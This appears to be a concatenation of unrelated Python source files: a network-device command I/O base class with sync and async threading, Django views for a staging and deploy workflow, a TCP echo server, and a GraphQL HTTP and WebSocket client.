Uses the username and password of the BaseLangInput"""
pass
def sendcommand(self, string):
"""writes a command as-is to the I/O.
If you call sendcommand(), you must also call readmessage() at some point in time, to avoid
stale results."""
raise NotImplementedError("BaseIOInput.sendcommand() is an abstract method. please override in %s" % type(self).__name__)
self.writetolog(string, input=True)
logger = logging.getLogger("protocols")
logger.debug("Sending command %s" % (repr(string)))
def readmessage(self, timeout):
"""Reads text from the terminal up to the next delimiter. Returns the string as-is,
without checking validity. The result MUST be an UTF-8 encoded string.
Should raise a TimeOut in case more than timeout seconds have passed."""
raise NotImplementedError("BaseIOInput.readmessage() is an abstract method. please override in %s" % type(self).__name__)
resultString = ""
self.writetolog(resultString, output=True)
logger = logging.getLogger("protocols")
logger.debug("Received %d bytes of data" % len(resultString))
return resultString
class BaseLangInput(object):
"""Base Language input. Abstract class, forming a third part of the BaseInput class, along with BaseIOInput and BaseCommandInput"""
username = ""
password = ""
terminator = "\r\n" # string that signifies the end of a response message
prompt = ">" # string that signifies the start of an input message
delimiter = "\r\n>" # the delimiter := terminator + prompt
# The distinction is only relevant when waiting for the first prompt or the last terminator before the EOF.
# For most languages, the prompt may be a regular expression (though this is not a requirement)
logfile = None
# LANGUAGE SPECIFIC METHODS
def authorize(self):
"""Authorize with a command, using language specific (rather than I/O-specific) routines.
May call send_and_receive(), but NOT command(), since that may be threaded."""
pass
def deauthorize(self):
"""Deauthorize, prior to disconnecting.
May call send_and_receive(), but NOT command(), since that may be threaded."""
pass
def setPrompt(self, prompt):
self.prompt = prompt
self.delimiter = self.terminator + self.prompt
logger = logging.getLogger("protocols")
logger.debug("Set delimiter to %s" % repr(self.delimiter))
def statusOK(self, status, command):
"""Checks the status. Returns normally if the status is successful,
or raises a CommandFailed, possibly with additional information."""
status = bool(status)
if not status:
raise exceptions.CommandFailed("Unexpected status '%s' from command '%s'" % (status, command))
def makeCommand(self, command):
"""Takes a command, and turns it into a string ready to send to the device.
It may add a line break (I/O specific), or an identifier in the command (language-specific).
Returns a tuple (identifier, commandstring). The identifier may be None
if there is no way to match input command and output result."""
return (None, command+"\n")
def parseMessage(self, resultString):
"""Takes a message, and parses it into a triple (resultlines, identifier, status).
The resultlines are typically an array of strings, the identifier something to match
the result to a given command, and the status is unspecified and is language-specific.
May raise a ParsingError in case the output can't be parsed, but does not
raise an exception if the status is unsuccessful."""
resultLines = resultString.split('\n');
return (resultLines, None, True)
def isAutonomousType(self, identifier, status):
"""Given the identifier and status, decide if the message is autonomous,
and if so, if it is of a certain type. For regular (non-autonomous) messages, return False."""
return False
def setLoginCredentials(self, username, password):
"""Set login credentials. Set password to "" if no password is required.
The username is used both for login (e.g. telnet/SSH) and authorize (e.g. TL1).
This assumes there is no overlap between login and authorize, which in practice is always true."""
self.username = username
if password != None:
self.password = password
def setLogFile(self, logfile):
"""Set log file to the given path"""
assert isinstance(logfile, str)
self.logfile = open(logfile, "a")
def closeLogFile(self):
if self.logfile:
self.logfile.close()
self.logfile = None
def writetolog(self, logstring, input=False, output=False):
"""Write to log file"""
if self.logfile:
self.acquireLoglock()
if input:
self.logfile.write("\n==input==\n")
elif output:
self.logfile.write("\n==output==\n")
else:
self.logfile.write("\n==i/o==\n")
self.logfile.write(logstring)
self.releaseLoglock()
class BaseSyncInput(object):
"""Base Command input, Synchronous version.
Abstract class, forming a third part of the BaseInput class, along with BaseIOInput and BaseLangInput.
The synchronous version does not create new threads, and will only send one command at a time to the
I/O. It will block till a response is returned, and process that one."""
autocallbacks = None # Dictionary with Callback functions for autonomous messages
# COMMAND SPECIFIC METHODS
def getmessage(self, identifier, timeout):
"""Given an identifier, waits until the appropriate message is returned by the device.
This function is blocking, although it may raise a timeout if nothing was returned in time.
Returns tuple (resultlines, status)."""
endtime = time.time() + timeout
skipcount = 0
logger = logging.getLogger("protocols")
while True:
result = self.readmessage(timeout) # may raise a TimeOut
(resultlines, residentifier, status) = self.parseMessage(result)
autotype = self.isAutonomousType(residentifier, status)
if (autotype != False):
# Autonomous message
if autotype in self.autocallbacks:
callback = self.autocallbacks[autotype]
logger.info("Sending autonomous message (type %s, identifier %s) to %s" % (autotype,residentifier,callback.__name__))
self.callback(callback, resultlines, status)
elif True in self.autocallbacks: # catch-all callback function
callback = self.autocallbacks[True]
logger.info("Sending autonomous message (type %s, identifier %s) to %s" % (autotype,residentifier,callback.__name__))
self.callback(callback, resultlines, status)
else:
logger.warning("Skipping unhandled autonomous message (type %s, identifier %s)" % (autotype,residentifier))
elif identifier == residentifier:
logger.debug("Got matching result for identifier %s" % identifier)
break
else:
skipcount += 1
logger.error("Skipping regular message with identifier %s" % (residentifier))
if time.time() > endtime:
raise exceptions.TimeOut("No reply with correct identifier %s after %d seconds (skipped %d responses)" % (identifier, timeout, skipcount))
resultlines = []
status = False
break
return (resultlines, status)
def send_and_receive(self, command, timeout):
"""Shortcut for makeCommand(), sendcommand(), readmessage(), parseMessage().
This only works for synchronous I/O. For asynchronous I/O, this function
is only used for authorization and de-authorization. Returns a tuple (resultlines, status)."""
(identifier, string) = self.makeCommand(command)
self.sendcommand(string)
(resultlines, status) = self.getmessage(identifier, timeout=timeout)
self.statusOK(status, command)
return (resultlines, status)
def command(self, command, timeout=None):
"""One of the main functions of BaseInput. Takes a command, and returns the result as an array of strings.
Makes sure the result is a match of the given command, and no error status was raised.
Language, I/O, and sync/async specific."""
if timeout == None:
timeout = self.timeout
(resultlines, status) = self.send_and_receive(command, timeout)
self.statusOK(status, command)
return resultlines
def isCorrectCallback(self, callback):
"""Verifies that the callback function has the proper format: f(lines) or f(lines, status=None).
Returns a boolean; does not raise an exception on error"""
if isinstance(callback, types.FunctionType):
argnames = callback.func_code.co_varnames
argcount = callback.func_code.co_argcount
return (argcount in [1,2])
elif isinstance(callback, types.MethodType):
argcount = callback.func_code.co_argcount
return (argcount in [2,3])
else:
return False
def hasStatusArgument(self, callback):
"""Checks whether the callback function accepts a status argument, i.e. has the form
f(lines, status=None) rather than f(lines). Returns a boolean; does not raise an exception on error"""
if isinstance(callback, types.FunctionType):
argcount = callback.func_code.co_argcount
return (argcount == 2)
elif isinstance(callback, types.MethodType):
argcount = callback.func_code.co_argcount
return (argcount == 3)
else:
return False
def callbackCommand(self, command, callback, timeout=None):
"""One of the main functions of BaseInput. Takes a command, and sends the result to the
callback functions. The function returns immediately, and is mostly asynchronous,
if possible by the underlying I/O."""
assert self.isCorrectCallback(callback)
# ("Callback function %s has not the proper argument list: %s(resultlines) or %s(resultline, status=None)", (callback.func_name,callback.func_name,callback.func_name))
if timeout == None:
timeout = self.timeout
(resultlines, status) = self.send_and_receive(command, timeout)
self.statusOK(status, command)
self.callback(callback, resultlines, status=status)
def callback(self, function, resultlines, status=None):
"""Call function with resultlines as argument. Either in a new thread or simply the current thread."""
if self.hasStatusArgument(function):
function(resultlines, status)
else:
function(resultlines)
def setAutonomousCallback(self, callback, autotype=True):
"""Set the function which is called for autonomous messages. If type is set, the function is
only called when isAutonomousType() in Language parser returns the same string"""
assert self.isCorrectCallback(callback)
# ("Callback function %s has not the proper argument list: %s(resultlines) or %s(resultline, status=None)", (callback.func_name,callback.func_name,callback.func_name))
if not self.autocallbacks:
self.autocallbacks = {}
assert autotype != None
logger = logging.getLogger("protocols")
logger.debug("Assigning callback function %s() to callback type %s" % (callback.__name__, autotype))
self.autocallbacks[autotype] = callback
def start(self):
"""Makes sure the actual I/O for the file or device is ready, logs in, and authorizes.
You shouldn't call it more than once"""
logger = logging.getLogger("protocols")
logger.debug("Fetching information from %s using %s" % (self.getTarget(), type(self).__name__))
if not self.autocallbacks:
self.autocallbacks = {}
self.connect()
self.login()
self.authorize()
def stop(self):
"""Deauthorizes, logs out, and closes the I/O connection. You shouldn't call it more than once"""
self.deauthorize()
self.disconnect()
self.closeLogFile()
def acquireMemLock(self):
return True;
def releaseMemLock(self):
return True;
def acquireLoglock(self):
return True;
def releaseLoglock(self):
return True;
class BaseAsyncInput(BaseSyncInput):
"""Base Command input, Asynchronous version.
Abstract class, forming a third part of the BaseInput class, along with BaseIOInput and BaseLangInput.
The asynchronous version uses two threads: one to send commands, and one to receive them.
If command() is used, it is still blocking, but with callbackCommand() multiple commands can be sent
to a device at the same time. This class is obviously thread-safe. Other Input classes wanting to
remain thread-safe should liberally call acquireIOlock() and acquireMemLock(), and release*Lock() of course"""
messages = None # dict (set in createThreads) of identifier: (status, resultlines)
callbacks = None # dict (set in createThreads) of identifier: (callback, timeout). Unset for synchronous messages.
receivethread = None # threading.Thread() object. continuously fetches information from the device.
dorun = False # signal the receivethread to keep running, or to stop.
threadedcallback = False # If True, callbacks are made in a new thread
callbackthread = None # dict of Threads
# COMMAND SPECIFIC METHODS
def send_and_receive(self, command, timeout):
"""Shortcut for makeCommand(), sendcommand(), readmessage(), parseMessage().
This only works for synchronous I/O. For asynchronous I/O, this function
is only used for authorization and de-authorization. Returns a tuple (resultlines, status).
This function is strictly synchronous and does not directly call getmessage(), since that is asynchronous"""
(cmdidentifier, string) = self.makeCommand(command)
self.sendcommand(string)
result = self.readmessage(timeout) # may raise a TimeOut
(resultlines, residentifier, status) = self.parseMessage(result)
self.statusOK(status, command)
if cmdidentifier != residentifier:
raise exceptions.CommandFailed("Result identifier %s does not match command identifier %s for command %s." % (residentifier, cmdidentifier, command))
return (resultlines, status)
def command(self, command, timeout=None):
"""One of the main functions of BaseInput. Takes a command, and returns the result as an array of strings.
Makes sure the result is a match of the given command, and no error status was raised.
Language, I/O, and sync/async specific."""
(identifier, string) = self.makeCommand(command)
# self.addIdentifierCallback(identifier, None, timeout)
try:
self.sendcommand(string)
if timeout == None:
timeout = self.timeout
(resultlines, status) = self.getmessage(identifier, timeout=timeout)
self.statusOK(status, command)
except: # all exceptions, including keyboard interrupts
self.stopThreads(timeout=0)
raise
return resultlines
def callbackCommand(self, command, callback, timeout=None):
"""One of the main functions of BaseInput. Takes a command, and sends the result to the
callback functions. The function returns immediately, and is mostly asynchronous,
if possible by the underlying I/O."""
assert self.isCorrectCallback(callback)
# ("Callback function %s has not the proper argument list: %s(resultlines) or %s(resultline, status=None)", (callback.func_name,callback.func_name,callback.func_name))
try:
(identifier, string) = self.makeCommand(command)
self.addIdentifierCallback(identifier, callback, timeout)
self.sendcommand(string)
except: # all exceptions, including keyboard interrupts
self.stopThreads(timeout=0)
raise
def addIdentifierCallback(self, identifier, callback, timeout=None):
"""Adds parameters for the callback to the callbacks variable"""
if timeout == None:
timeout = self.timeout
self.acquireMemLock()
if identifier in self.callbacks:
raise exceptions.NetworkException("A command with identifier %s was already sent. Can't use the same identifier more than once in asynchronous mode." % identifier)
logger = logging.getLogger("protocols")
logger.debug("Remember callback function %s() for identifier %s" % (callback.__name__, identifier))
self.callbacks[identifier] = (callback, time.time()+timeout)
self.releaseMemLock()
def getmessage(self, identifier, timeout):
"""Given an identifier, waits until the appropriate message shows up in the messages{} dictionary.
This function is blocking, although it may raise a timeout if nothing was returned in time.
Returns tuple (resultlines, status). This function must only be called for async mode. For sync mode, call send_and_receive"""
if identifier in self.callbacks:
raise AssertionError("getmessages() should not be called with an identifier (%s) present in self.callbacks" % identifier)
endtime = time.time() + timeout
while identifier not in self.messages:
time.sleep(0.04)
if time.time() > endtime:
break
if identifier not in self.messages:
raise exceptions.TimeOut("identifier %s not found in messages within %d seconds. Available identifiers: %s" % (identifier, timeout, str(self.messages.keys())))
self.acquireMemLock()
if identifier in self.messages:
(resultlines, status) = self.messages[identifier]
del self.messages[identifier]
self.releaseMemLock()
return (resultlines, status)
def checkTimeouts(self):
"""Check that the timeouts in callbacks{} have not passed. If one has, a result was received,
but the result was never used."""
# TODO: decide on the return result. And, eh, this still has to be written too
pass
def callback(self, function, resultlines, status=None):
"""Call function with resultlines as argument. Either in a new thread or simply the current thread."""
if self.threadedcallback:
name = function.__name__ + " callback"
if self.hasStatusArgument(function):
arguments = (resultlines, status) # create a tuple
else:
arguments = (resultlines,) # create a tuple
callbackthread = threading.Thread(target=function, name=name, args=arguments)
callbackthread.start()
self.callbackthreads.append(callbackthread)
else:
if self.hasStatusArgument(function):
function(resultlines, status)
else:
function(resultlines)
def processMessage(self, message):
"""Calls parseMessage and checks the type of the message. Calls the callback function for autonomous
messages or regular results with a known callback function. Otherwise, simply add the message to
the messages dictionary, so it can be retrieved by getmessage() in another thread."""
logger = logging.getLogger("protocols")
(resultlines, identifier, status) = self.parseMessage(message)
autotype = self.isAutonomousType(identifier, status)
if (autotype != False):
# Autonomous message
if autotype in self.autocallbacks: # specific callback function
callback = self.autocallbacks[autotype]
logger.info("Sending autonomous message (type %s, identifier %s) to %s()" % (autotype,identifier,callback.__name__))
self.callback(callback, resultlines, status=status)
elif True in self.autocallbacks: # catch-all callback function
callback = self.autocallbacks[True]
logger.info("Sending autonomous message (type %s, identifier %s) to %s()" % (autotype,identifier,callback.__name__))
self.callback(callback, resultlines, status=status)
else:
logger.info("Skipping unhandled autonomous message (type %s, identifier %s)" % (autotype,identifier))
return
callback = None
self.acquireMemLock()
if identifier in self.callbacks:
# regular message, with known callback function
(callback, timeout) = self.callbacks[identifier]
del self.callbacks[identifier]
self.releaseMemLock()
if callback:
logger.info("Sending regular message with identifier %s to %s()" % (identifier,callback.__name__))
self.callback(callback, resultlines, status)
else:
# regular message
self.acquireMemLock()
if identifier in self.messages:
raise exceptions.CommandFailed("Can't append result with identifier %s: a result with the same identifier already exists." % identifier)
logger.debug("Appending message result with identifier %s to messages queue" % (identifier))
self.messages[identifier] = (resultlines, status)
self.releaseMemLock()
def fetchMessages(self):
"""Function in a separate thread. Repeatedly calls readmessage() (with a short timeout), and
processMessage() with any possible result. The thread is stopped if dorun is set to False.
Calls checkTimeouts() every once in a while"""
timeout = max(2,int(self.timeout/3)) # a short timeout (max 2 sec.), so we're quickly back in the loop
logger = logging.getLogger("protocols")
logger.debug("Asynchronously fetching messages with %0.1f second interval" % (timeout))
while (self.dorun == True) or (len(self.callbacks) > 0):
try:
message = self.readmessage(timeout=timeout)
# logger.debug("Got %d bytes of data" % (len(message)))
self.processMessage(message)
except exceptions.TimeOut:
logger.debug("Waiting for data")
pass
self.checkTimeouts()
def createThreads(self):
"""Initializes internal variables, and start listening thread. This function is called
after login() and authorize() are called."""
self.messages = {}
self.callbacks = {}
self.callbackthreads = []
name = "Thread-"+self.getTarget()+"-receiver"
self.receivethread = threading.Thread(target=self.fetchMessages, name=name)
self.dorun = True
self.receivethread.start()
def stopThreads(self, timeout=None):
# Signal thread to stop, and stop it with a timeout
logger = logging.getLogger("protocols")
self.dorun = False
if timeout == None:
timeout = 1.2*self.timeout # Add a little margin; we may have to wait for many connections..
logger.debug("Stopping receiver threads (with %d sec timeout)" % timeout)
self.receivethread.join(timeout=timeout)
logger.debug("Stopping %d parser threads (with %d sec timeout each)" % (len(self.callbackthreads), timeout))
for callbackthread in self.callbackthreads:
callbackthread.join(timeout=timeout)
if len(self.messages) > 0:
logger.error("Unprocessed messages left in queue with id %s, after stopping listener thread" % str(self.messages.keys()))
if self.receivethread.isAlive():
logger.error("Receiver thread is still active, despite an attempt to stop it.")
def acquireMemLock(self):
"""Acquires memory lock. This function can only be called after start() has been called"""
return self.memlock.acquire() # blocking
# WARNING: Function with time-out doesn't work very well, because of the delay
# (thread A never got the lock, since thread B held the lock for a long time, and
# got it back before A -- apparently it was not handed out in request order)
# gotlock = False
# endtime = time.time() + 10 # 10 sec timeout
# logger = logging.getLogger("protocols")
# (callerfilename, linenumber, callername, text) = traceback.extract_stack()[-2]
# logger.debug("Acquire memory lock id %s from %s() in file %s by thread %s" % (id(self.loglock), callername, callerfilename, threading.currentThread().getName()))
# while True:
# gotlock = self.memlock.acquire(False) # non-blocking
# if gotlock:
# break
# if time.time() > endtime:
# raise exceptions.TimeOut("Unable to get a memory lock in 10 seconds.")
# time.sleep(0.05)
# return gotlock;
def releaseMemLock(self):
"""Releases memory lock. You MUST never call releaseMemLock() if you didn't acquire it first."""
# logger = logging.getLogger("protocols")
# logger.debug("Release memory lock id %s" % id(self.memlock))
self.memlock.release()
return True;
def acquireLoglock(self):
"""Acquires I/O lock. This function can only be called after start() has been called"""
gotlock = False
endtime = time.time() + 10 # 10 sec timeout
# logger = logging.getLogger("protocols")
# logger.debug("Acquire log lock by thread %s" % (threading.currentThread().getName()))
while True:
gotlock = self.iolock.acquire(False) # non-blocking
if gotlock:
break
if time.time() > endtime:
raise exceptions.TimeOut("Thread %s is unable to get a log lock in 10 seconds." % (threading.currentThread().getName()))
time.sleep(0.05)
return gotlock;
def releaseLoglock(self):
"""Releases I/O lock. You MUST never call releaseMemLock() if you didn't acquire it first."""
# logger = logging.getLogger("protocols")
# logger.debug("Release log lock by thread %s" % (threading.currentThread().getName()))
self.iolock.release()
return True;
def start(self):
"""Make sure the actual I/O for the file or device is ready. logs in, authorize.
You shouldn't call it more than once"""
logger = logging.getLogger("protocols")
logger.debug("Fetching information asynchronous from %s using %s" % (self.getTarget(), type(self).__name__))
if not self.autocallbacks:
self.autocallbacks = {}
self.iolock = threading.Lock()
self.memlock = threading.Lock()
self.connect()
self.login()
self.authorize() # call authorize while still in sync mode. It uses send_and_receive().
self.createThreads()
def stop(self):
"""Deauthorizes, logs out, and closes the I/O connection. You shouldn't call it more than once"""
self.stopThreads()
self.deauthorize() # deauthorize used send_and_receive, and is thus synchronous
self.disconnect()
self.closeLogFile()
self.iolock = None
self.memlock = None
# Note: methods in first class override methods in later classes
class BaseInput(BaseIOInput, BaseLangInput, BaseAsyncInput):
"""A base input class, consisting of three parts working togther:
the I/O, Language and Command part"""
pass
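# Usage sketch (not part of the original source): autonomous messages can be routed
# to a catch-all handler by registering it under the key True before start(); the
# concrete subclass name and its constructor arguments below are assumptions.
#
# def on_autonomous(resultlines, status):
#     print(status, resultlines)
#
# device = SomeConcreteInput(...)             # hypothetical subclass of BaseInput
# device.autocallbacks = {True: on_autonomous}
# device.start()
# ...                                         # interact with the device
# device.stop()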
|
views.py
|
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from django.template import loader
from django.utils import timezone, dateformat
from django.urls import reverse
from threading import Thread
from pathlib import Path
from .models import Status
from .forms import CsvForm
from .services import Stager, WaxHelper, LogFinder
def index(request):
"""
"""
if request.method == 'POST':
status = Status.objects.create(date=timezone.now())
status.save()
return HttpResponseRedirect(reverse('stage:workflow', args=(status.id,)))
else:
template = loader.get_template('stage/index.html')
status_list = Status.objects.order_by('-date')
context = {'data': status_list}
return HttpResponse(template.render(context, request))
def workflow(request, status_id):
"""
"""
template = loader.get_template('stage/workflow.html')
status = Status.objects.get(pk=status_id)
csv_form = CsvForm()
context = {'status': status,
'csv_form': csv_form}
return HttpResponse(template.render(context, request))
def detail(request, status_id):
"""
"""
return HttpResponse("You're looking at question %s." % status_id)
def output_file_path(status_id, phase):
"""
"""
BASE_DIR = Path(__file__).resolve().parent.parent
return f"%s/logs/stage/{status_id}-{phase}.txt" %str(BASE_DIR)
def stage_csv(request, status_id):
"""
"""
status = Status.objects.get(pk=status_id)
if request.method == 'POST':
form = CsvForm(request.POST)
if form.is_valid():
filename = form.cleaned_data['csv_filename']
try:
output = output_file_path(status_id, "csv")
Stager.stage_csv(form.cleaned_data['csv_filename'], output)
except Exception as e:
return render(request, 'stage/stage_csv.html', {
'error_msg': str(e),
'status': status
})
# Update status
status.csv_staged = True
status.save()
template = loader.get_template('stage/stage_csv.html')
context = {'status': status,
'filename' : filename,
'csv_staged': status.csv_staged}
return HttpResponse(template.render(context, request))
else:
form = CsvForm()
return render(request, 'stage/stage_csv.html', {'form': form})
def stage_images(request, status_id):
"""
"""
status = Status.objects.get(pk=status_id)
output = output_file_path(status_id, "images")
t = Thread(target=Stager.stage_images, args=(output,))
t.start()
# Update status
status.images_staged = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Image staging initiated: %s" %dt,
'out' : f"stage/images-{status_id}.txt",
'status': status}
template = loader.get_template('stage/stage_images.html')
return HttpResponse(template.render(context, request))
def generate_derivatives(request, status_id):
"""
"""
output = output_file_path(status_id, "derivatives")
t = Thread(target=WaxHelper.generate_derivatives, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.derivatives_generated = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Derivative generation initiated: %s" %dt,
'out' : f"stage/derivatives-{status_id}.txt",
'status': status}
template = loader.get_template('stage/generate_derivatives.html')
return HttpResponse(template.render(context, request))
def derivative_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "derivatives")
data = LogFinder.find(log, "TIFFFetchNormalTag")
return HttpResponse(data)
def images_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "images")
data = LogFinder.find(log)
return HttpResponse(data)
def pages_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "pages")
data = LogFinder.find(log)
return HttpResponse(data)
def index_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "index")
data = LogFinder.find(log)
return HttpResponse(data)
def run_local_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "run")
data = LogFinder.find(log)
return HttpResponse(data)
def deploy_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "deploy")
data = LogFinder.find(log)
return HttpResponse(data)
def generate_pages(request, status_id):
"""
"""
output = output_file_path(status_id, "pages")
t = Thread(target=WaxHelper.generate_pages, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.pages_generated = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Page generation initiated: %s" %dt,
'out' : f"stage/pages-{status_id}.txt",
'status': status}
template = loader.get_template('stage/generate_pages.html')
return HttpResponse(template.render(context, request))
def generate_index(request, status_id):
"""
"""
output = output_file_path(status_id, "index")
t = Thread(target=WaxHelper.generate_index, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.indexes_rebuilt = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Index generation initiated: %s" %dt,
'out' : f"stage/index-{status_id}.txt",
'status': status}
template = loader.get_template('stage/generate_index.html')
return HttpResponse(template.render(context, request))
def run_local_site(request, status_id):
"""
"""
output = output_file_path(status_id, "run")
t = Thread(target=WaxHelper.run_local, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.deploy_local = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Local site initiated: %s" %dt,
'out' : f"stage/run-{status_id}.txt",
'status': status}
template = loader.get_template('stage/run_local.html')
return HttpResponse(template.render(context, request))
def kill_local_site(request, status_id):
"""
"""
WaxHelper.kill_local()
status = Status.objects.get(pk=status_id)
# Update status
status.kill_local = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Local site stopped: %s" %dt,
'status': status}
template = loader.get_template('stage/kill_local.html')
return HttpResponse(template.render(context, request))
def deploy(request, status_id):
"""
"""
output = output_file_path(status_id, "deploy")
t = Thread(target=WaxHelper.deploy, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.deploy_aws = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Deploying to AWS: %s" %dt,
'out' : f"stage/deploy-{status_id}.txt",
'status': status}
template = loader.get_template('stage/deploy.html')
return HttpResponse(template.render(context, request))
|
echoserver.py
|
import socket
import threading
import argparse
def run_server(host, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind((host, port))
listener.listen(5)
print('Echo server is listening at', port)
while True:
conn, addr = listener.accept()
threading.Thread(target=handle_client, args=(conn, addr)).start()
finally:
listener.close()
def handle_client(conn, addr):
print('New client from', addr)
try:
while True:
data = conn.recv(1024)
if not data:
break
conn.sendall(data)
finally:
conn.close()
# Usage python echoserver.py [--port port-number]
parser = argparse.ArgumentParser()
parser.add_argument("--port", help="echo server port", type=int, default=8007)
args = parser.parse_args()
run_server('', args.port)
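# Quick manual check (sketch, assuming the server above is running locally on the
# default port 8007):
# import socket
# s = socket.socket()
# s.connect(('127.0.0.1', 8007))
# s.sendall(b'hello')
# print(s.recv(1024))    # expect b'hello' echoed back
# s.close()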
|
graphql_client.py
|
"""
GraphQL Client
"""
from datetime import datetime
import json
import random
import string
import threading
import time
import websocket
from six.moves import urllib
from . import __version__
class GraphQLClient:
"""
A simple GraphQL client
"""
def __init__(self, endpoint, session=None, verify=True):
self.endpoint = endpoint
self.headername = None
self.session = session
self.token = None
self.verify = verify
def execute(self, query, variables=None):
"""
Execute a query
Parameters
----------
- query
- variables
"""
return self._send(query, variables)
def inject_token(self, token, headername='Authorization'):
"""
Inject a token
Parameters
----------
- token
- headername: by default "Authorization"
"""
self.token = token
self.headername = headername
def _send(self, query, variables):
"""
Send the query
Parameters
----------
- query
- variables
"""
data = {'query': query,
'variables': variables}
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Powered-By': f'Kili Playground/{__version__}'}
if self.token is not None:
headers[self.headername] = f'{self.token}'
if self.session is not None:
req = None
try:
number_of_trials = 10
for _ in range(number_of_trials):
self.session.verify = self.verify
req = self.session.post(self.endpoint, json.dumps(
data).encode('utf-8'), headers=headers)
if req.status_code == 200 and 'errors' not in req.json():
break
time.sleep(1)
return req.json()
except Exception as exception:
if req is not None:
raise Exception(req.content) from exception
raise exception
req = urllib.request.Request(
self.endpoint, json.dumps(data).encode('utf-8'), headers)
try:
with urllib.request.urlopen(req) as response:
str_json = response.read().decode('utf-8')
return json.loads(str_json)
except urllib.error.HTTPError as error:
print((error.read()))
print('')
raise error
GQL_WS_SUBPROTOCOL = "graphql-ws"
class SubscriptionGraphQLClient:
"""
A simple GraphQL client that works over Websocket as the transport
protocol, instead of HTTP.
This follows the Apollo protocol.
https://github.com/apollographql/subscriptions-transport-ws/blob/master/PROTOCOL.md
"""
# pylint: disable=too-many-instance-attributes, too-many-arguments
def __init__(self, url):
self.ws_url = url
self._id = None
self._paused = False
self._connect()
self._subscription_running = False
self._st_id = None
self.failed_connection_attempts = 0
def _connect(self):
"""
Handles the connection
"""
# pylint: disable=no-member
self._conn = websocket.create_connection(self.ws_url,
on_message=self._on_message,
subprotocols=[GQL_WS_SUBPROTOCOL])
self._created_at = datetime.now()
self._conn.on_message = self._on_message
def _reconnect(self):
"""
Handles the reconnection
"""
self._connect()
self._subscription_running = True
dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
print(f'{dt_string} reconnected')
self.failed_connection_attempts = 0
def _on_message(self, message):
"""
Handles messages
Parameters
----------
- message : the message
"""
# pylint: disable=no-self-use
data = json.loads(message)
# skip keepalive messages
if data['type'] != 'ka':
print(message)
def _conn_init(self, headers=None, authorization=None):
"""
Initializes the websocket connection
Parameters
----------
- headers : Headers are necessary for Kili API v1
- authorization : Headers are necessary for Kili API v2
"""
payload = {
'type': 'connection_init',
'payload': {'headers': headers, 'Authorization': authorization}
}
self._conn.send(json.dumps(payload))
self._conn.recv()
def _start(self, payload):
"""
Handles start
Parameters
----------
- payload
"""
_id = gen_id()
frame = {'id': _id, 'type': 'start', 'payload': payload}
self._conn.send(json.dumps(frame))
return _id
def _stop(self, _id):
"""
Handles stop
Parameters
----------
- _id: connection id
"""
payload = {'id': _id, 'type': 'stop'}
self._conn.send(json.dumps(payload))
return self._conn.recv()
def query(self, query, variables=None, headers=None):
"""
Sends a query
Parameters
----------
- query
- variables
- headers
"""
self._conn_init(headers)
payload = {'headers': headers, 'query': query, 'variables': variables}
_id = self._start(payload)
res = self._conn.recv()
self._stop(_id)
return res
def prepare_subscribe(self, query, variables, headers, callback, authorization):
"""
Prepares a subscription
Parameters
----------
- query
- variables
- headers
- callback: function executed after the subscription
- authorization: authorization header
"""
self._conn_init(headers, authorization)
payload = {'headers': headers, 'query': query, 'variables': variables}
_cc = self._on_message if not callback else callback
_id = self._start(payload)
self._id = _id
return _cc, _id
def subscribe(self, query, variables=None, headers=None, callback=None, authorization=None):
"""
Subscribes
Parameters
----------
- query
- variables
- headers
- callback: function executed after the subscription
- authorization: authorization header
"""
_cc, _id = self.prepare_subscribe(
query, variables, headers, callback, authorization)
def subs(_cc, _id):
max_reconnections = 10
self._subscription_running = True
while self._subscription_running \
and self.failed_connection_attempts < max_reconnections:
try:
response = json.loads(self._conn.recv())
if response['type'] == 'error' or response['type'] == 'complete':
print(response)
self._stop_subscribe(_id)
break
if response['type'] != 'ka' and not self._paused:
_cc(_id, response)
time.sleep(1)
except websocket._exceptions.WebSocketConnectionClosedException as error: # pylint: disable=no-member,protected-access
self.failed_connection_attempts += 1
dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
error_message = str(error)
print(f'{dt_string} Connection closed error : {error_message}')
print(
'Will try to reconnect'
f' {max_reconnections - self.failed_connection_attempts} times...')
self._reconnect()
_cc, _id = self.prepare_subscribe(
query, variables, headers, callback, authorization)
continue
print(
f'Did not reconnect successfully after {max_reconnections} attempts')
self._st_id = threading.Thread(target=subs, args=(_cc, _id))
self._st_id.start()
return _id
def _stop_subscribe(self, _id):
self._subscription_running = False
self._stop(_id)
def close(self):
"""
Handles close
"""
self._conn.close()
def pause(self):
"""
Handles pause
"""
self._paused = True
def unpause(self):
"""
Handles unpause
"""
self._paused = False
def get_lifetime(self):
"""
Return the lifetime
"""
return (datetime.now() - self._created_at).seconds
def reset_timeout(self):
"""
Resets the timeout
"""
self._reconnect()
def gen_id(size=6, chars=string.ascii_letters + string.digits):
"""
Generate random alphanumeric id
Parameters
----------
- size: length of the id
- chars: chars used to generate the id
"""
return ''.join(random.choice(chars) for _ in range(size))
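# Usage sketch (not part of the original source; the endpoint URL, token and query
# are illustrative assumptions):
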